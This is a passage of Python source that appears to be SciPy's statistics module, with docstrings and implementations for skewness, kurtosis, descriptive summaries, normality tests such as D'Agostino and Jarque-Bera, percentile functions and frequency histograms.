* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
variation : ndarray
The calculated variation along the requested axis.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Examples
--------
>>> from scipy.stats import variation
>>> variation([1, 2, 3, 4, 5])
0.47140452079103173
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.variation(a, axis)
return a.std(axis) / a.mean(axis)
def skew(a, axis=0, bias=True, nan_policy='propagate'):
r"""
Compute the sample skewness of a data set.
For normally distributed data, the skewness should be about zero. For
unimodal continuous distributions, a skewness value greater than zero means
that there is more weight in the right tail of the distribution. The
function `skewtest` can be used to determine if the skewness value
is close enough to zero, statistically speaking.
Parameters
----------
a : ndarray
Input array.
axis : int or None, optional
Axis along which skewness is calculated. Default is 0.
If None, compute over the whole array `a`.
bias : bool, optional
If False, then the calculations are corrected for statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
skewness : ndarray
The skewness of values along an axis, returning 0 where all values are
equal.
Notes
-----
The sample skewness is computed as the Fisher-Pearson coefficient
of skewness, i.e.
.. math::
g_1=\frac{m_3}{m_2^{3/2}}
where
.. math::
m_i=\frac{1}{N}\sum_{n=1}^N(x[n]-\bar{x})^i
is the biased sample :math:`i\texttt{th}` central moment, and :math:`\bar{x}` is
the sample mean. If ``bias`` is False, the calculations are
corrected for bias and the value computed is the adjusted
Fisher-Pearson standardized moment coefficient, i.e.
.. math::
G_1=\frac{k_3}{k_2^{3/2}}=
\frac{\sqrt{N(N-1)}}{N-2}\frac{m_3}{m_2^{3/2}}.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Section 2.2.24.1
Examples
--------
>>> from scipy.stats import skew
>>> skew([1, 2, 3, 4, 5])
0.0
>>> skew([2, 8, 0, 4, 1, 9, 9, 0])
0.2650554122698573
"""
a, axis = _chk_asarray(a, axis)
n = a.shape[axis]
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.skew(a, axis, bias)
m2 = moment(a, 2, axis)
m3 = moment(a, 3, axis)
zero = (m2 == 0)
vals = _lazywhere(~zero, (m2, m3),
lambda m2, m3: m3 / m2**1.5,
0.)
if not bias:
can_correct = (n > 2) & (m2 > 0)
if can_correct.any():
m2 = np.extract(can_correct, m2)
m3 = np.extract(can_correct, m3)
nval = np.sqrt((n - 1.0) * n) / (n - 2.0) * m3 / m2**1.5
np.place(vals, can_correct, nval)
if vals.ndim == 0:
return vals.item()
return vals
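# Illustrative sketch (not part of the original scipy source): the biased
# Fisher-Pearson skewness g1 = m3 / m2**1.5 from the skew() docstring above,
# computed directly from the central moments.
def _skew_sketch(a):
    a = np.asarray(a, dtype=float)
    d = a - a.mean()
    m2 = np.mean(d ** 2)
    m3 = np.mean(d ** 3)
    return m3 / m2 ** 1.5
# _skew_sketch([2, 8, 0, 4, 1, 9, 9, 0]) agrees with skew([2, 8, 0, 4, 1, 9, 9, 0]).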
def kurtosis(a, axis=0, fisher=True, bias=True, nan_policy='propagate'):
"""
Compute the kurtosis (Fisher or Pearson) of a dataset.
Kurtosis is the fourth central moment divided by the square of the
variance. If Fisher's definition is used, then 3.0 is subtracted from
the result to give 0.0 for a normal distribution.
If bias is False then the kurtosis is calculated using k statistics to
eliminate bias coming from biased moment estimators
Use `kurtosistest` to see if result is close enough to normal.
Parameters
----------
a : array
Data for which the kurtosis is calculated.
axis : int or None, optional
Axis along which the kurtosis is calculated. Default is 0.
If None, compute over the whole array `a`.
fisher : bool, optional
If True, Fisher's definition is used (normal ==> 0.0). If False,
Pearson's definition is used (normal ==> 3.0).
bias : bool, optional
If False, then the calculations are corrected for statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
kurtosis : array
The kurtosis of values along an axis. If all values are equal,
return -3 for Fisher's definition and 0 for Pearson's definition.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Examples
--------
    In Fisher's definition, the kurtosis of the normal distribution is zero.
In the following example, the kurtosis is close to zero, because it was
calculated from the dataset, not from the continuous distribution.
>>> from scipy.stats import norm, kurtosis
>>> data = norm.rvs(size=1000, random_state=3)
>>> kurtosis(data)
-0.06928694200380558
The distribution with a higher kurtosis has a heavier tail.
The zero valued kurtosis of the normal distribution in Fisher's definition
can serve as a reference point.
>>> import matplotlib.pyplot as plt
>>> import scipy.stats as stats
>>> from scipy.stats import kurtosis
>>> x = np.linspace(-5, 5, 100)
>>> ax = plt.subplot()
>>> distnames = ['laplace', 'norm', 'uniform']
>>> for distname in distnames:
... if distname == 'uniform':
... dist = getattr(stats, distname)(loc=-2, scale=4)
... else:
... dist = getattr(stats, distname)
... data = dist.rvs(size=1000)
... kur = kurtosis(data, fisher=True)
... y = dist.pdf(x)
... ax.plot(x, y, label="{}, {}".format(distname, round(kur, 3)))
... ax.legend()
The Laplace distribution has a heavier tail than the normal distribution.
The uniform distribution (which has negative kurtosis) has the thinnest
tail.
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.kurtosis(a, axis, fisher, bias)
n = a.shape[axis]
m2 = moment(a, 2, axis)
m4 = moment(a, 4, axis)
zero = (m2 == 0)
olderr = np.seterr(all='ignore')
try:
vals = np.where(zero, 0, m4 / m2**2.0)
finally:
np.seterr(**olderr)
if not bias:
can_correct = (n > 3) & (m2 > 0)
if can_correct.any():
m2 = np.extract(can_correct, m2)
m4 = np.extract(can_correct, m4)
nval = 1.0/(n-2)/(n-3) * ((n**2-1.0)*m4/m2**2.0 - 3*(n-1)**2.0)
np.place(vals, can_correct, nval + 3.0)
if vals.ndim == 0:
vals = vals.item() # array scalar
return vals - 3 if fisher else vals
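# Illustrative sketch (not part of the original scipy source): the biased
# Fisher kurtosis m4 / m2**2 - 3 computed directly from the central moments,
# i.e. what kurtosis() above returns in the default bias=True, fisher=True case.
def _kurtosis_sketch(a):
    a = np.asarray(a, dtype=float)
    d = a - a.mean()
    m2 = np.mean(d ** 2)
    m4 = np.mean(d ** 4)
    return m4 / m2 ** 2 - 3.0
# _kurtosis_sketch(np.arange(10)) -> about -1.2242, matching the kurtosis shown
# in the describe() example below.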
DescribeResult = namedtuple('DescribeResult',
('nobs', 'minmax', 'mean', 'variance', 'skewness',
'kurtosis'))
def describe(a, axis=0, ddof=1, bias=True, nan_policy='propagate'):
"""
Compute several descriptive statistics of the passed array.
Parameters
----------
a : array_like
Input data.
axis : int or None, optional
Axis along which statistics are calculated. Default is 0.
If None, compute over the whole array `a`.
ddof : int, optional
Delta degrees of freedom (only for variance). Default is 1.
bias : bool, optional
If False, then the skewness and kurtosis calculations are corrected for
statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
nobs : int or ndarray of ints
Number of observations (length of data along `axis`).
When 'omit' is chosen as nan_policy, each column is counted separately.
minmax: tuple of ndarrays or floats
Minimum and maximum value of data array.
mean : ndarray or float
Arithmetic mean of data along axis.
variance : ndarray or float
Unbiased variance of the data along axis, denominator is number of
observations minus one.
skewness : ndarray or float
Skewness, based on moment calculations with denominator equal to
the number of observations, i.e. no degrees of freedom correction.
kurtosis : ndarray or float
Kurtosis (Fisher). The kurtosis is normalized so that it is
zero for the normal distribution. No degrees of freedom are used.
See Also
--------
skew, kurtosis
Examples
--------
>>> from scipy import stats
>>> a = np.arange(10)
>>> stats.describe(a)
DescribeResult(nobs=10, minmax=(0, 9), mean=4.5, variance=9.166666666666666,
skewness=0.0, kurtosis=-1.2242424242424244)
>>> b = [[1, 2], [3, 4]]
>>> stats.describe(b)
DescribeResult(nobs=2, minmax=(array([1, 2]), array([3, 4])),
mean=array([2., 3.]), variance=array([2., 2.]),
skewness=array([0., 0.]), kurtosis=array([-2., -2.]))
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.describe(a, axis, ddof, bias)
if a.size == 0:
raise ValueError("The input must not be empty.")
n = a.shape[axis]
mm = (np.min(a, axis=axis), np.max(a, axis=axis))
m = np.mean(a, axis=axis)
v = np.var(a, axis=axis, ddof=ddof)
sk = skew(a, axis, bias=bias)
kurt = kurtosis(a, axis, bias=bias)
return DescribeResult(n, mm, m, v, sk, kurt)
#####################################
# NORMALITY TESTS #
#####################################
SkewtestResult = namedtuple('SkewtestResult', ('statistic', 'pvalue'))
def skewtest(a, axis=0, nan_policy='propagate'):
"""
Test whether the skew is different from the normal distribution.
This function tests the null hypothesis that the skewness of
the population that the sample was drawn from is the same
as that of a corresponding normal distribution.
Parameters
----------
a : array
The data to be tested.
axis : int or None, optional
Axis along which statistics are calculated. Default is 0.
If None, compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The computed z-score for this test.
pvalue : float
Two-sided p-value for the hypothesis test.
Notes
-----
The sample size must be at least 8.
References
----------
.. [1] R. B. D'Agostino, A. J. Belanger and R. B. D'Agostino Jr.,
"A suggestion for using powerful and informative tests of
normality", American Statistician 44, pp. 316-321, 1990.
Examples
--------
>>> from scipy.stats import skewtest
>>> skewtest([1, 2, 3, 4, 5, 6, 7, 8])
SkewtestResult(statistic=1.0108048609177787, pvalue=0.3121098361421897)
>>> skewtest([2, 8, 0, 4, 1, 9, 9, 0])
SkewtestResult(statistic=0.44626385374196975, pvalue=0.6554066631275459)
>>> skewtest([1, 2, 3, 4, 5, 6, 7, 8000])
SkewtestResult(statistic=3.571773510360407, pvalue=0.0003545719905823133)
>>> skewtest([100, 100, 100, 100, 100, 100, 100, 101])
SkewtestResult(statistic=3.5717766638478072, pvalue=0.000354567720281634)
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.skewtest(a, axis)
if axis is None:
a = np.ravel(a)
axis = 0
b2 = skew(a, axis)
n = a.shape[axis]
if n < 8:
raise ValueError(
"skewtest is not valid with less than 8 samples; %i samples"
" were given." % int(n))
y = b2 * math.sqrt(((n + 1) * (n + 3)) / (6.0 * (n - 2)))
beta2 = (3.0 * (n**2 + 27*n - 70) * (n+1) * (n+3) /
((n-2.0) * (n+5) * (n+7) * (n+9)))
W2 = -1 + math.sqrt(2 * (beta2 - 1))
delta = 1 / math.sqrt(0.5 * math.log(W2))
alpha = math.sqrt(2.0 / (W2 - 1))
y = np.where(y == 0, 1, y)
Z = delta * np.log(y / alpha + np.sqrt((y / alpha)**2 + 1))
return SkewtestResult(Z, 2 * distributions.norm.sf(np.abs(Z)))
KurtosistestResult = namedtuple('KurtosistestResult', ('statistic', 'pvalue'))
def kurtosistest(a, axis=0, nan_policy='propagate'):
"""
Test whether a dataset has normal kurtosis.
This function tests the null hypothesis that the kurtosis
of the population from which the sample was drawn is that
of the normal distribution: ``kurtosis = 3(n-1)/(n+1)``.
Parameters
----------
a : array
Array of the sample data.
axis : int or None, optional
Axis along which to compute test. Default is 0. If None,
compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The computed z-score for this test.
pvalue : float
The two-sided p-value for the hypothesis test.
Notes
-----
Valid only for n>20. This function uses the method described in [1]_.
References
----------
.. [1] see e.g. F. J. Anscombe, W. J. Glynn, "Distribution of the kurtosis
statistic b2 for normal samples", Biometrika, vol. 70, pp. 227-234, 1983.
Examples
--------
>>> from scipy.stats import kurtosistest
>>> kurtosistest(list(range(20)))
KurtosistestResult(statistic=-1.7058104152122062, pvalue=0.08804338332528348)
>>> np.random.seed(28041990)
>>> s = np.random.normal(0, 1, 1000)
>>> kurtosistest(s)
KurtosistestResult(statistic=1.2317590987707365, pvalue=0.21803908613450895)
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.kurtosistest(a, axis)
n = a.shape[axis]
if n < 5:
raise ValueError(
"kurtosistest requires at least 5 observations; %i observations"
" were given." % int(n))
if n < 20:
warnings.warn("kurtosistest only valid for n>=20 ... continuing "
"anyway, n=%i" % int(n))
b2 = kurtosis(a, axis, fisher=False)
E = 3.0*(n-1) / (n+1)
varb2 = 24.0*n*(n-2)*(n-3) / ((n+1)*(n+1.)*(n+3)*(n+5)) # [1]_ Eq. 1
x = (b2-E) / np.sqrt(varb2) # [1]_ Eq. 4
# [1]_ Eq. 2:
sqrtbeta1 = 6.0*(n*n-5*n+2)/((n+7)*(n+9)) * np.sqrt((6.0*(n+3)*(n+5)) /
(n*(n-2)*(n-3)))
# [1]_ Eq. 3:
A = 6.0 + 8.0/sqrtbeta1 * (2.0/sqrtbeta1 + np.sqrt(1+4.0/(sqrtbeta1**2)))
term1 = 1 - 2/(9.0*A)
denom = 1 + x*np.sqrt(2/(A-4.0))
term2 = np.sign(denom) * np.where(denom == 0.0, np.nan,
np.power((1-2.0/A)/np.abs(denom), 1/3.0))
if np.any(denom == 0):
msg = "Test statistic not defined in some cases due to division by " \
"zero. Return nan in that case..."
warnings.warn(msg, RuntimeWarning)
Z = (term1 - term2) / np.sqrt(2/(9.0*A)) # [1]_ Eq. 5
if Z.ndim == 0:
Z = Z[()]
# zprob uses upper tail, so Z needs to be positive
return KurtosistestResult(Z, 2 * distributions.norm.sf(np.abs(Z)))
NormaltestResult = namedtuple('NormaltestResult', ('statistic', 'pvalue'))
def normaltest(a, axis=0, nan_policy='propagate'):
"""
Test whether a sample differs from a normal distribution.
This function tests the null hypothesis that a sample comes
from a normal distribution. It is based on D'Agostino and
Pearson's [1]_, [2]_ test that combines skew and kurtosis to
produce an omnibus test of normality.
Parameters
----------
a : array_like
The array containing the sample to be tested.
axis : int or None, optional
Axis along which to compute test. Default is 0. If None,
compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float or array
``s^2 + k^2``, where ``s`` is the z-score returned by `skewtest` and
``k`` is the z-score returned by `kurtosistest`.
pvalue : float or array
A 2-sided chi squared probability for the hypothesis test.
References
----------
.. [1] D'Agostino, R. B. (1971), "An omnibus test of normality for
moderate and large sample size", Biometrika, 58, 341-348
.. [2] D'Agostino, R. and Pearson, E. S. (1973), "Tests for departure from
normality", Biometrika, 60, 613-622
Examples
--------
>>> from scipy import stats
>>> pts = 1000
>>> np.random.seed(28041990)
>>> a = np.random.normal(0, 1, size=pts)
>>> b = np.random.normal(2, 1, size=pts)
>>> x = np.concatenate((a, b))
>>> k2, p = stats.normaltest(x)
>>> alpha = 1e-3
>>> print("p = {:g}".format(p))
p = 3.27207e-11
>>> if p < alpha: # null hypothesis: x comes from a normal distribution
... print("The null hypothesis can be rejected")
... else:
... print("The null hypothesis cannot be rejected")
The null hypothesis can be rejected
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.normaltest(a, axis)
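    # Combine the two z-scores: k2 = Z_skew**2 + Z_kurt**2 follows,
    # approximately, a chi-squared distribution with 2 degrees of freedom
    # when the data are normal (D'Agostino-Pearson omnibus test).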
s, _ = skewtest(a, axis)
k, _ = kurtosistest(a, axis)
k2 = s*s + k*k
return NormaltestResult(k2, distributions.chi2.sf(k2, 2))
def jarque_bera(x):
"""
Perform the Jarque-Bera goodness of fit test on sample data.
The Jarque-Bera test tests whether the sample data has the skewness and
kurtosis matching a normal distribution.
Note that this test only works for a large enough number of data samples
(>2000) as the test statistic asymptotically has a Chi-squared distribution
with 2 degrees of freedom.
Parameters
----------
x : array_like
Observations of a random variable.
Returns
-------
jb_value : float
The test statistic.
p : float
The p-value for the hypothesis test.
References
----------
.. [1] Jarque, C. and Bera, A. (1980) "Efficient tests for normality,
homoscedasticity and serial independence of regression residuals",
6 Econometric Letters 255-259.
Examples
--------
>>> from scipy import stats
>>> np.random.seed(987654321)
>>> x = np.random.normal(0, 1, 100000)
>>> y = np.random.rayleigh(1, 100000)
>>> stats.jarque_bera(x)
(4.7165707989581342, 0.09458225503041906)
>>> stats.jarque_bera(y)
(6713.7098548143422, 0.0)
"""
x = np.asarray(x)
n = x.size
if n == 0:
raise ValueError('At least one observation is required.')
mu = x.mean()
diffx = x - mu
skewness = (1 / n * np.sum(diffx**3)) / (1 / n * np.sum(diffx**2))**(3 / 2.)
kurtosis = (1 / n * np.sum(diffx**4)) / (1 / n * np.sum(diffx**2))**2
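    # JB = n/6 * (S**2 + (K - 3)**2 / 4); under the null hypothesis of
    # normality, JB is asymptotically chi-squared with 2 degrees of freedom.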
jb_value = n / 6 * (skewness**2 + (kurtosis - 3)**2 / 4)
p = 1 - distributions.chi2.cdf(jb_value, 2)
return jb_value, p
#####################################
# FREQUENCY FUNCTIONS #
#####################################
@np.deprecate(message="`itemfreq` is deprecated and will be removed in a "
"future version. Use instead `np.unique(..., return_counts=True)`")
def itemfreq(a):
"""
Return a 2-D array of item frequencies.
Parameters
----------
a : (N,) array_like
Input array.
Returns
-------
itemfreq : (K, 2) ndarray
A 2-D frequency table. Column 1 contains sorted, unique values from
`a`, column 2 contains their respective counts.
Examples
--------
>>> from scipy import stats
>>> a = np.array([1, 1, 5, 0, 1, 2, 2, 0, 1, 4])
>>> stats.itemfreq(a)
array([[ 0., 2.],
[ 1., 4.],
[ 2., 2.],
[ 4., 1.],
[ 5., 1.]])
>>> np.bincount(a)
array([2, 4, 2, 0, 1, 1])
>>> stats.itemfreq(a/10.)
array([[ 0. , 2. ],
[ 0.1, 4. ],
[ 0.2, 2. ],
[ 0.4, 1. ],
[ 0.5, 1. ]])
"""
items, inv = np.unique(a, return_inverse=True)
freq = np.bincount(inv)
return np.array([items, freq]).T
def scoreatpercentile(a, per, limit=(), interpolation_method='fraction',
axis=None):
"""
Calculate the score at a given percentile of the input sequence.
For example, the score at `per=50` is the median. If the desired quantile
lies between two data points, we interpolate between them, according to
    the value of `interpolation_method`. If the parameter `limit` is provided, it
should be a tuple (lower, upper) of two values.
Parameters
----------
a : array_like
A 1-D array of values from which to extract score.
per : array_like
Percentile(s) at which to extract score. Values should be in range
[0,100].
limit : tuple, optional
Tuple of two scalars, the lower and upper limits within which to
compute the percentile. Values of `a` outside
this (closed) interval will be ignored.
interpolation_method : {'fraction', 'lower', 'higher'}, optional
Specifies the interpolation method to use,
when the desired quantile lies between two data points `i` and `j`
The following options are available (default is 'fraction'):
* 'fraction': ``i + (j - i) * fraction`` where ``fraction`` is the
fractional part of the index surrounded by ``i`` and ``j``
* 'lower': ``i``
* 'higher': ``j``
axis : int, optional
Axis along which the percentiles are computed. Default is None. If
None, compute over the whole array `a`.
Returns
-------
score : float or ndarray
Score at percentile(s).
See Also
--------
percentileofscore, numpy.percentile
Notes
-----
    This function will become obsolete in the future.
    For NumPy 1.9 and higher, `numpy.percentile` provides all the functionality
    that `scoreatpercentile` provides, and it is significantly faster.
    Therefore it is recommended to use `numpy.percentile` for users that have
    numpy >= 1.9.
Examples
--------
>>> from scipy import stats
>>> a = np.arange(100)
>>> stats.scoreatpercentile(a, 50)
49.5
"""
# adapted from NumPy's percentile function. When we require numpy >= 1.8,
# the implementation of this function can be replaced by np.percentile.
a = np.asarray(a)
if a.size == 0:
# empty array, return nan(s) with shape matching `per`
if np.isscalar(per):
return np.nan
else:
return np.full(np.asarray(per).shape, np.nan, dtype=np.float64)
if limit:
a = a[(limit[0] <= a) & (a <= limit[1])]
sorted_ = np.sort(a, axis=axis)
if axis is None:
axis = 0
return _compute_qth_percentile(sorted_, per, interpolation_method, axis)
# handle sequence of per's without calling sort multiple times
def _compute_qth_percentile(sorted_, per, interpolation_method, axis):
if not np.isscalar(per):
score = [_compute_qth_percentile(sorted_, i,
interpolation_method, axis)
for i in per]
return np.array(score)
if not (0 <= per <= 100):
raise ValueError("percentile must be in the range [0, 100]")
indexer = [slice(None)] * sorted_.ndim
idx = per / 100. * (sorted_.shape[axis] - 1)
if int(idx) != idx:
# round fractional indices according to interpolation method
if interpolation_method == 'lower':
idx = int(np.floor(idx))
elif interpolation_method == 'higher':
idx = int(np.ceil(idx))
elif interpolation_method == 'fraction':
pass # keep idx as fraction and interpolate
else:
raise ValueError("interpolation_method can only be 'fraction', "
"'lower' or 'higher'")
i = int(idx)
if i == idx:
indexer[axis] = slice(i, i + 1)
weights = array(1)
sumval = 1.0
else:
indexer[axis] = slice(i, i + 2)
j = i + 1
weights = array([(j - idx), (idx - i)], float)
wshape = [1] * sorted_.ndim
wshape[axis] = 2
weights.shape = wshape
sumval = weights.sum()
# Use np.add.reduce (== np.sum but a little faster) to coerce data type
return np.add.reduce(sorted_[tuple(indexer)] * weights, axis=axis) / sumval
def percentileofscore(a, score, kind='rank'):
"""
Compute the percentile rank of a score relative to a list of scores.
A `percentileofscore` of, for example, 80% means that 80% of the
scores in `a` are below the given score. In the case of gaps or
ties, the exact definition depends on the optional keyword, `kind`.
Parameters
----------
a : array_like
Array of scores to which `score` is compared.
score : int or float
Score that is compared to the elements in `a`.
kind : {'rank', 'weak', 'strict', 'mean'}, optional
Specifies the interpretation of the resulting score.
The following options are available (default is 'rank'):
* 'rank': Average percentage ranking of score. In case of multiple
matches, average the percentage rankings of all matching scores.
* 'weak': This kind corresponds to the definition of a cumulative
distribution function. A percentileofscore of 80% means that 80%
of values are less than or equal to the provided score.
* 'strict': Similar to "weak", except that only values that are
strictly less than the given score are counted.
* 'mean': The average of the "weak" and "strict" scores, often used
in testing. See https://en.wikipedia.org/wiki/Percentile_rank
Returns
-------
pcos : float
Percentile-position of score (0-100) relative to `a`.
See Also
--------
numpy.percentile
Examples
--------
Three-quarters of the given values lie below a given score:
>>> from scipy import stats
>>> stats.percentileofscore([1, 2, 3, 4], 3)
75.0
With multiple matches, note how the scores of the two matches, 0.6
and 0.8 respectively, are averaged:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3)
70.0
Only 2/5 values are strictly less than 3:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='strict')
40.0
But 4/5 values are less than or equal to 3:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='weak')
80.0
The average between the weak and the strict scores is:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='mean')
60.0
"""
if np.isnan(score):
return np.nan
a = np.asarray(a)
n = len(a)
if n == 0:
return 100.0
if kind == 'rank':
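        # Average the percentile ranks of all values equal to `score`; when
        # there are no exact matches this reduces to the mean of the 'weak'
        # and 'strict' definitions.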
left = np.count_nonzero(a < score)
right = np.count_nonzero(a <= score)
pct = (right + left + (1 if right > left else 0)) * 50.0/n
return pct
elif kind == 'strict':
return np.count_nonzero(a < score) / n * 100
elif kind == 'weak':
return np.count_nonzero(a <= score) / n * 100
elif kind == 'mean':
pct = (np.count_nonzero(a < score) + np.count_nonzero(a <= score)) / n * 50
return pct
else:
raise ValueError("kind can only be 'rank', 'strict', 'weak' or 'mean'")
HistogramResult = namedtuple('HistogramResult',
('count', 'lowerlimit', 'binsize', 'extrapoints'))
def _histogram(a, numbins=10, defaultlimits=None, weights=None, printextras=False):
"""
Create a histogram.
Separate the range into several bins and return the number of instances
in each bin.
Parameters
----------
a : array_like
Array of scores which will be put into bins.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultlimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in a is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0
printextras : bool, optional
If True, if there are extra points (i.e. the points that fall outside
the bin limits) a warning is raised saying how many of those points
there are. Default is False.
Returns
-------
count : ndarray
Number of points (or sum of weights) in each bin.
lowerlimit : float
Lowest value of histogram, the lower limit of the first bin.
binsize : float
The size of the bins (all bins have the same size).
extrapoints : int
The number of points outside the range of the histogram.
See Also
--------
numpy.histogram
Notes
-----
This histogram is based on numpy's histogram but has a larger range by
default if default limits is not set.
"""
a = np.ravel(a)
if defaultlimits is None:
if a.size == 0:
# handle empty arrays. Undetermined range, so use 0-1.
defaultlimits = (0, 1)
else:
# no range given, so use values in `a`
data_min = a.min()
data_max = a.max()
# Have bins extend past min and max values slightly
s = (data_max - data_min) / (2. * (numbins - 1.))
defaultlimits = (data_min - s, data_max + s)
# use numpy's histogram method to compute bins
hist, bin_edges = np.histogram(a, bins=numbins, range=defaultlimits,
weights=weights)
    # hist is not always float; convert it to keep the old output dtype
    hist = np.array(hist, dtype=float)
    # a fixed bin width is assumed, since numpy's histogram returns
    # equal-width bins when an int is passed for 'bins'
binsize = bin_edges[1] - bin_edges[0]
# calculate number of extra points
extrapoints = len([v for v in a
if defaultlimits[0] > v or v > defaultlimits[1]])
if extrapoints > 0 and printextras:
warnings.warn("Points outside given histogram range = %s"
% extrapoints)
return HistogramResult(hist, defaultlimits[0], binsize, extrapoints)
CumfreqResult = namedtuple('CumfreqResult',
('cumcount', 'lowerlimit', 'binsize',
'extrapoints'))
def cumfreq(a, numbins=10, defaultreallimits=None, weights=None):
"""
Return a cumulative frequency histogram, using the histogram function.
A cumulative histogram is a mapping that counts the cumulative number of
observations in all of the bins up to the specified bin.
Parameters
----------
a : array_like
Input array.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultreallimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in `a` is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0
Returns
-------
cumcount : ndarray
Binned values of cumulative frequency.
lowerlimit : float
        Lower real limit.
binsize : float
Width of each bin.
extrapoints : int
Extra points.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy import stats
>>> x = [1, 4, 2, 1, 3, 1]
>>> res = stats.cumfreq(x, numbins=4, defaultreallimits=(1.5, 5))
>>> res.cumcount
array([ 1., 2., 3., 3.])
>>> res.extrapoints
3
Create a normal distribution with 1000 random values
>>> rng = np.random.RandomState(seed=12345)
>>> samples = stats.norm.rvs(size=1000, random_state=rng)
Calculate cumulative frequencies
>>> res = stats.cumfreq(samples, numbins=25)
Calculate space of values for x
>>> x = res.lowerlimit + np.linspace(0, res.binsize*res.cumcount.size,
... res.cumcount.size)
Plot histogram and cumulative histogram
>>> fig = plt.figure(figsize=(10, 4))
>>> ax1 = fig.add_subplot(1, 2, 1)
>>> ax2 = fig.add_subplot(1, 2, 2)
>>> ax1.hist(samples, bins=25)
>>> ax1.set_title('Histogram')
>>> ax2.bar(x, res.cumcount, width=res.binsize)
>>> ax2.set_title('Cumulative histogram')
>>> ax2.set_xlim([x.min(), x.max()])
>>> plt.show()
"""
h, l, b, e = _histogram(a, numbins, defaultreallimits, weights=weights)
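    # The cumulative count per bin is the running sum of the per-bin counts.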
cumhist = np.cumsum(h * 1, axis=0)
return CumfreqResult(cumhist, l, b, e)
RelfreqResult = namedtuple('RelfreqResult',
('frequency', 'lowerlimit', 'binsize',
'extrapoints'))
def relfreq(a, numbins=10, defaultreallimits=None, weights=None):
"""
Return a relative frequency histogram, using the histogram function.
A relative frequency histogram is a mapping of the number of
observations in each of the bins relative to the total of observations.
Parameters
----------
a : array_like
Input array.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultreallimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in a is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0
Returns
-------
frequency : ndarray
Binned values of relative frequency.
lowerlimit : float
Lower real limit.
binsize : float
Width of each bin.
extrapoints : int
Extra points.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy import stats
>>> a = np.array([2, 4, 1, 2, 3, 2])
>>> res = stats.relfreq(a, numbins=4)
>>> res.frequency
array([ 0.16666667, 0.5 , 0.16666667, 0.16666667])
>>> np.sum(res.frequency) # relative frequencies should add up to 1
1.0
Create a normal distribution with 1000 random values
>>> rng = np.random.RandomState(seed=12345)
>>> samples = stats.norm.rvs(size=1000, random_state=rng)
